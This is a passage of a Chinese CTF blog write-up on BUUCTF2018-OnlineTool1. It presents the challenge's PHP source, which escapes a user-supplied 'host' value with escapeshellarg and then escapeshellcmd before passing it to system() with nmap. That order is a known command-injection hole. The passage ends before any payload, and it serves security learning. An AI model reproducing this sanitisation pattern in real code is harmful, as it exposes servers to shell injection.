<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>BUUCTF2018-OnlineTool1 | MIXBP</title>
  <meta name="keywords" content=" 刷题笔记 , escapeshellarg()和escapeshellcmd()、单引号逃逸 ">
  <meta name="description" content="BUUCTF2018-OnlineTool1 | MIXBP">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="Flask是一个非常小的PythonWeb框架，被称为微型框架；只提供了一个稳健的核心，其他功能全部是通过扩展实现的；意思就是我们可以根据项目的需要量身定制，也意味着我们需要学习各种扩展库的使用。 基本概念创建通过创建路由并关联函数，实现一个基本的网页 1234567891011121314151617181920from flask import Flask# 用当前脚本名称实例化Flask对">
<meta property="og:type" content="article">
<meta property="og:title" content="Flask库学习">
<meta property="og:url" content="https://mixbp.github.io/master/2025/03/23/Flask%E5%BA%93%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="MIXBP">
<meta property="og:description" content="Flask是一个非常小的PythonWeb框架，被称为微型框架；只提供了一个稳健的核心，其他功能全部是通过扩展实现的；意思就是我们可以根据项目的需要量身定制，也意味着我们需要学习各种扩展库的使用。 基本概念创建通过创建路由并关联函数，实现一个基本的网页 1234567891011121314151617181920from flask import Flask# 用当前脚本名称实例化Flask对">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-03-23T08:10:30.000Z">
<meta property="article:modified_time" content="2025-03-23T08:16:35.256Z">
<meta property="article:author" content="MIXBP">
<meta property="article:tag" content="学习笔记">
<meta property="article:tag" content="Flask">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>MIXBP</span>
</div>

<div class="icon">
    
        
            <a title="github"
               href="https://mixbp.github.io/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="email"
               href="mailto:2439254357@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=2439254357&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
</div>



    <a class="more-menus">更多菜单</a>



<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(46)</small>
            
        </div>
    </li>
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
                <a class="dynamic-menu "
                   target="_self"
                   
                   href="https://mixbp.github.io/">MIXBP</a>
        
            
                <a class="dynamic-menu "
                   target="_blank"
                        
                   href="https://mixbp.github.io/">github</a>
        
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">About</a>
        
        <a style="width: 50%"
                
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="46">
<input type="hidden" id="yelog_site_word_count" value="125k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://mixbp.github.io/">MIXBP</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="search shortcut key i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="switch to outline view shortcut key w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="return"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="case sensitive"></i>
            <i class="iconfont icon-tag" data-title="label"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">outline</div>
            <i class="iconfont icon-list" data-title="switch to article list"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>报错注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>堆叠注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>命令执行</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>日志包含</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>刷题笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文件包含</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文件上传</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息搜集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>学习笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>正则表达式</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>做题笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>escapeshellarg()和escapeshellcmd()、单引号逃逸</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>filter伪协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Flask</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>HTML</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>http协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux find -name模糊查询文件</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>MySQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>payload构造</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php反序列化</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP反序列化漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php特性</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssrf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssti</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>waf绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xss</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xss漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xxe</a>
            </li>
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        
        <a  class="All "
           href="/2025/03/23/Flask%E5%BA%93%E5%AD%A6%E4%B9%A0/"
           data-tag="学习笔记,Flask"
           data-author="" >
            <span class="post-title" title="Flask库学习">Flask库学习</span>
            <span class="post-date" title="2025-03-23 16:10:30">2025/03/23</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/21/ssti%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5/"
           data-tag="学习笔记,ssti"
           data-author="" >
            <span class="post-title" title="ssti模版注入">ssti模版注入</span>
            <span class="post-date" title="2025-03-21 21:17:45">2025/03/21</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/21/BUUCTF2018-OnlineTool1/"
           data-tag="刷题笔记,escapeshellarg()和escapeshellcmd()、单引号逃逸"
           data-author="" >
            <span class="post-title" title="BUUCTF2018-OnlineTool1">BUUCTF2018-OnlineTool1</span>
            <span class="post-date" title="2025-03-21 19:50:32">2025/03/21</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/21/BJDCTF2020-ZJCTF%E4%B8%8D%E8%BF%87%E5%A6%82%E6%AD%A4/"
           data-tag="刷题笔记,php特性"
           data-author="" >
            <span class="post-title" title="BJDCTF2020-ZJCTF不过如此">BJDCTF2020-ZJCTF不过如此</span>
            <span class="post-date" title="2025-03-21 19:04:56">2025/03/21</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/20/%E7%BD%91%E9%BC%8E%E6%9D%AF2020%E6%9C%B1%E9%9B%80%E7%BB%84phpweb1/"
           data-tag="刷题笔记,命令执行,php反序列化,linux find -name模糊查询文件"
           data-author="" >
            <span class="post-title" title="网鼎杯2020朱雀组phpweb1">网鼎杯2020朱雀组phpweb1</span>
            <span class="post-date" title="2025-03-20 23:56:35">2025/03/20</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/20/BSidesCF2020Hadabadday1/"
           data-tag="刷题笔记,文件包含"
           data-author="" >
            <span class="post-title" title="BSidesCF2020Hadabadday1">BSidesCF2020Hadabadday1</span>
            <span class="post-date" title="2025-03-20 23:55:26">2025/03/20</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/20/%E7%BD%91%E9%BC%8E%E6%9D%AF2018Fakebook1/"
           data-tag="刷题笔记,sql注入,php反序列化,ssrf"
           data-author="" >
            <span class="post-title" title="网鼎杯2018Fakebook1">网鼎杯2018Fakebook1</span>
            <span class="post-date" title="2025-03-20 23:53:35">2025/03/20</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/19/ctfshow-ssrf/"
           data-tag="学习笔记,ssrf"
           data-author="" >
            <span class="post-title" title="ctfshow-ssrf">ctfshow-ssrf</span>
            <span class="post-date" title="2025-03-19 20:05:14">2025/03/19</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/19/ctfshow-xxe/"
           data-tag="学习笔记,xxe"
           data-author="" >
            <span class="post-title" title="ctfshow-xxe">ctfshow-xxe</span>
            <span class="post-date" title="2025-03-19 13:32:30">2025/03/19</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/16/ssrf/"
           data-tag="学习笔记,ssrf"
           data-author="" >
            <span class="post-title" title="ssrf">ssrf</span>
            <span class="post-date" title="2025-03-16 21:44:06">2025/03/16</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/14/ctfshow-php%E5%BA%8F%E5%88%97%E5%8C%96/"
           data-tag="学习笔记,php反序列化"
           data-author="" >
            <span class="post-title" title="ctfshow-php序列化">ctfshow-php序列化</span>
            <span class="post-date" title="2025-03-14 22:11:16">2025/03/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/14/GXYCTF2019-BabySQli1/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="GXYCTF2019-BabySQli1">GXYCTF2019-BabySQli1</span>
            <span class="post-date" title="2025-03-14 20:44:55">2025/03/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/13/%E7%BD%91%E9%BC%8E%E6%9D%AF2020%E9%9D%92%E9%BE%99%E7%BB%84-AreUSerialz1/"
           data-tag="刷题笔记,文件包含,php反序列化"
           data-author="" >
            <span class="post-title" title="网鼎杯2020青龙组-AreUSerialz1">网鼎杯2020青龙组-AreUSerialz1</span>
            <span class="post-date" title="2025-03-13 23:36:35">2025/03/13</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/13/ZJCTF2019-NiZhuanSiWei1/"
           data-tag="刷题笔记,文件包含"
           data-author="" >
            <span class="post-title" title="ZJCTF2019-NiZhuanSiWei1">ZJCTF2019-NiZhuanSiWei1</span>
            <span class="post-date" title="2025-03-13 20:39:05">2025/03/13</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/12/RoarCTF2019-EasyCalc1/"
           data-tag="刷题笔记,命令执行,waf绕过"
           data-author="" >
            <span class="post-title" title="RoarCTF2019-EasyCalc1">RoarCTF2019-EasyCalc1</span>
            <span class="post-date" title="2025-03-12 19:36:00">2025/03/12</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/11/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-HardSQL1/"
           data-tag="刷题笔记,sql注入,报错注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019-HardSQL1">极客大挑战2019-HardSQL1</span>
            <span class="post-date" title="2025-03-11 15:31:27">2025/03/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/11/%E5%BC%BA%E7%BD%91%E6%9D%AF2019-%E9%9A%8F%E4%BE%BF%E6%B3%A81/"
           data-tag="刷题笔记,sql注入,堆叠注入"
           data-author="" >
            <span class="post-title" title="强网杯2019-随便注1">强网杯2019-随便注1</span>
            <span class="post-date" title="2025-03-11 00:07:32">2025/03/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/08/ctfshow-sqli-labs/"
           data-tag="学习笔记,sql注入"
           data-author="" >
            <span class="post-title" title="ctfshow-sqli-labs">ctfshow-sqli-labs</span>
            <span class="post-date" title="2025-03-08 17:51:18">2025/03/08</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/04/ctfshow-sql%E6%B3%A8%E5%85%A5/"
           data-tag="学习笔记,sql注入"
           data-author="" >
            <span class="post-title" title="ctfshow-sql注入">ctfshow-sql注入</span>
            <span class="post-date" title="2025-03-04 23:42:23">2025/03/04</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/02/php%E7%89%B9%E6%80%A7/"
           data-tag="php特性,学习笔记"
           data-author="" >
            <span class="post-title" title="php特性">php特性</span>
            <span class="post-date" title="2025-03-02 20:14:41">2025/03/02</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/24/ctfshow-php%E7%89%B9%E6%80%A7/"
           data-tag="php特性,学习笔记"
           data-author="" >
            <span class="post-title" title="ctfshow-php特性">ctfshow-php特性</span>
            <span class="post-date" title="2025-02-24 18:53:16">2025/02/24</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/23/ctfshow-xss/"
           data-tag="学习笔记,xss"
           data-author="" >
            <span class="post-title" title="ctfshow-xss">ctfshow-xss</span>
            <span class="post-date" title="2025-02-23 17:12:49">2025/02/23</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/23/ctfshow-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/"
           data-tag="学习笔记,信息搜集"
           data-author="" >
            <span class="post-title" title="ctfshow-信息搜集">ctfshow-信息搜集</span>
            <span class="post-date" title="2025-02-23 15:24:36">2025/02/23</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/17/ctfshow-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/"
           data-tag="学习笔记,命令执行"
           data-author="" >
            <span class="post-title" title="ctfshow-命令执行">ctfshow-命令执行</span>
            <span class="post-date" title="2025-02-17 00:00:48">2025/02/17</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/14/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"
           data-tag="学习笔记,PHP反序列化漏洞"
           data-author="" >
            <span class="post-title" title="PHP反序列化">PHP反序列化</span>
            <span class="post-date" title="2025-02-14 00:51:53">2025/02/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/12/xss%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"
           data-tag="学习笔记,xss漏洞"
           data-author="" >
            <span class="post-title" title="xss漏洞总结">xss漏洞总结</span>
            <span class="post-date" title="2025-02-12 03:30:15">2025/02/12</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/11/xss-labs/"
           data-tag="学习笔记,xss漏洞"
           data-author="" >
            <span class="post-title" title="xss-labs">xss-labs</span>
            <span class="post-date" title="2025-02-11 23:43:19">2025/02/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/01/linux%E5%9F%BA%E7%A1%80%E5%91%BD%E4%BB%A4/"
           data-tag="学习笔记,linux"
           data-author="" >
            <span class="post-title" title="linux基础命令">linux基础命令</span>
            <span class="post-date" title="2025-02-01 22:14:44">2025/02/01</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/"
           data-tag="学习笔记,命令执行"
           data-author="" >
            <span class="post-title" title="命令执行">命令执行</span>
            <span class="post-date" title="2025-01-29 22:54:38">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/ctfshow-web82/"
           data-tag="文件包含,做题笔记"
           data-author="" >
            <span class="post-title" title="ctfshow-web82">ctfshow-web82</span>
            <span class="post-date" title="2025-01-29 04:36:22">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"
           data-tag="文件包含,学习笔记"
           data-author="" >
            <span class="post-title" title="文件包含漏洞总结">文件包含漏洞总结</span>
            <span class="post-date" title="2025-01-29 02:22:55">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/26/ctfshow-web160/"
           data-tag="做题笔记,文件上传,日志包含"
           data-author="" >
            <span class="post-title" title="[ctfshow]web160">[ctfshow]web160</span>
            <span class="post-date" title="2025-01-26 16:37:35">2025/01/26</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/26/buuctf%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98upload/"
           data-tag="做题笔记,文件上传"
           data-author="" >
            <span class="post-title" title="buuctf极客大挑战upload">buuctf极客大挑战upload</span>
            <span class="post-date" title="2025-01-26 16:36:39">2025/01/26</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/22/upload/"
           data-tag="学习笔记,文件上传"
           data-author="" >
            <span class="post-title" title="upload">upload</span>
            <span class="post-date" title="2025-01-22 15:22:47">2025/01/22</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/19/python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,python"
           data-author="" >
            <span class="post-title" title="python学习笔记">python学习笔记</span>
            <span class="post-date" title="2025-01-19 01:39:35">2025/01/19</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/09/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019Http/"
           data-tag="刷题笔记,http协议"
           data-author="" >
            <span class="post-title" title="极客大挑战2019Http">极客大挑战2019Http</span>
            <span class="post-date" title="2025-01-09 16:47:44">2025/01/09</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/09/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019SecretFile/"
           data-tag="刷题笔记,filter伪协议"
           data-author="" >
            <span class="post-title" title="极客大挑战2019SecretFile">极客大挑战2019SecretFile</span>
            <span class="post-date" title="2025-01-09 01:36:08">2025/01/09</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019LoveSQL/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019LoveSQL">极客大挑战2019LoveSQL</span>
            <span class="post-date" title="2025-01-05 20:00:42">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019Havefun/"
           data-tag="刷题笔记,payload构造"
           data-author="" >
            <span class="post-title" title="极客大挑战2019Havefun">极客大挑战2019Havefun</span>
            <span class="post-date" title="2025-01-05 19:35:48">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019EasySQL/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019EasySQL">极客大挑战2019EasySQL</span>
            <span class="post-date" title="2025-01-05 19:10:32">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/03/sql%E6%B3%A8%E5%85%A5/"
           data-tag="学习笔记,sql注入"
           data-author="" >
            <span class="post-title" title="sql注入">sql注入</span>
            <span class="post-date" title="2025-01-03 21:14:16">2025/01/03</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/29/MySQL/"
           data-tag="学习笔记,MySQL"
           data-author="" >
            <span class="post-title" title="MySQL">MySQL</span>
            <span class="post-date" title="2024-12-29 19:30:51">2024/12/29</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/28/php%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,正则表达式"
           data-author="" >
            <span class="post-title" title="正则表达式笔记">正则表达式笔记</span>
            <span class="post-date" title="2024-12-28 20:46:55">2024/12/28</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/26/PHP%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,php"
           data-author="" >
            <span class="post-title" title="PHP学习笔记">PHP学习笔记</span>
            <span class="post-date" title="2024-12-26 23:50:15">2024/12/26</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/25/HTML%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,HTML"
           data-author="" >
            <span class="post-title" title="HTML学习笔记">HTML学习笔记</span>
            <span class="post-date" title="2024-12-25 23:54:00">2024/12/25</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/25/welcome/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="welcome">welcome</span>
            <span class="post-date" title="2024-12-25 20:38:33">2024/12/25</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="Toggle full screen shortcut key s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-BUUCTF2018-OnlineTool1" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">BUUCTF2018-OnlineTool1</h1>
    
    <div class="article-meta">
        
        
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">刷题笔记</a>
            
            <a class="color5">escapeshellarg()和escapeshellcmd()、单引号逃逸</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2025-03-21 20:11:22'>2025-03-21 19:50</time>
        
    </div>
    <div class="article-meta">
        
        <span>Count:1.3k</span>
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="Jump to comment area">
            <a href="#comments">
                Comment:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#BUUCTF2018-OnlineTool1"><span class="toc-text">BUUCTF2018-OnlineTool1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#escapeshellarg"><span class="toc-text">escapeshellarg()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#escapeshellcmd"><span class="toc-text">escapeshellcmd()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A"><span class="toc-text">知识点：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#escapeshellarg-1"><span class="toc-text">escapeshellarg()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#escapeshellcmd-1"><span class="toc-text">escapeshellcmd()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#nmap-oG"><span class="toc-text">nmap -oG</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="BUUCTF2018-OnlineTool1"><a href="#BUUCTF2018-OnlineTool1" class="headerlink" title="BUUCTF2018-OnlineTool1"></a>BUUCTF2018-OnlineTool1</h1><p>首先启动靶机并访问，看到一串源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>])) &#123;<br>    <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REMOTE_ADDR&#x27;</span>] = <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>];<br>&#125;<br><br><span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;host&#x27;</span>])) &#123;<br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>&#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-variable">$host</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;host&#x27;</span>];<br>    <span class="hljs-variable">$host</span> = <span class="hljs-title function_ invoke__">escapeshellarg</span>(<span class="hljs-variable">$host</span>);<br>    <span class="hljs-variable">$host</span> = <span class="hljs-title function_ invoke__">escapeshellcmd</span>(<span class="hljs-variable">$host</span>);<br>    <span class="hljs-variable">$sandbox</span> = <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-string">&quot;glzjin&quot;</span>. <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REMOTE_ADDR&#x27;</span>]);<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;you are in sandbox &#x27;</span>.<span class="hljs-variable">$sandbox</span>;<br>    @<span class="hljs-title function_ invoke__">mkdir</span>(<span class="hljs-variable">$sandbox</span>);<br>    <span class="hljs-title function_ invoke__">chdir</span>(<span class="hljs-variable">$sandbox</span>);<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&quot;nmap -T5 -sT -Pn --host-timeout 2 -F &quot;</span>.<span class="hljs-variable">$host</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>一堆函数，并且有没见过的函数escapeshellarg、escapeshellcmd，所以先查查这些函数</p>
<p>这段<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E4%BB%A3%E7%A0%81%E5%9D%97&spm=1001.2101.3001.7020">代码块</a>检查请求中是否设置了<code>HTTP_X_FORWARDED_FOR</code>头部。如果设置了，它将<code>REMOTE_ADDR</code>设置为<code>HTTP_X_FORWARDED_FOR</code>的值。这通常用于处理<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=Web%E6%9C%8D%E5%8A%A1%E5%99%A8&spm=1001.2101.3001.7020">Web服务器</a>位于代理后面的情况。</p>
<p>chdir($sandbox);<br>chdir 函数用于改变当前的工作目录（Current Working Directory，CWD）为指定的目录。</p>
<p>在这里，$sandbox 是之前根据用户IP地址创建的沙盒目录的名称（通过 md5(“glzjin” . $_SERVER[‘REMOTE_ADDR’]) 计算得到的）。</p>
<p>这意味着 PHP 脚本的当前工作目录将被更改为用户特定的沙盒目录，后续的文件和命令将在这个目录下执行。</p>
<h2 id="escapeshellarg"><a href="#escapeshellarg" class="headerlink" title="escapeshellarg()"></a>escapeshellarg()</h2><blockquote>
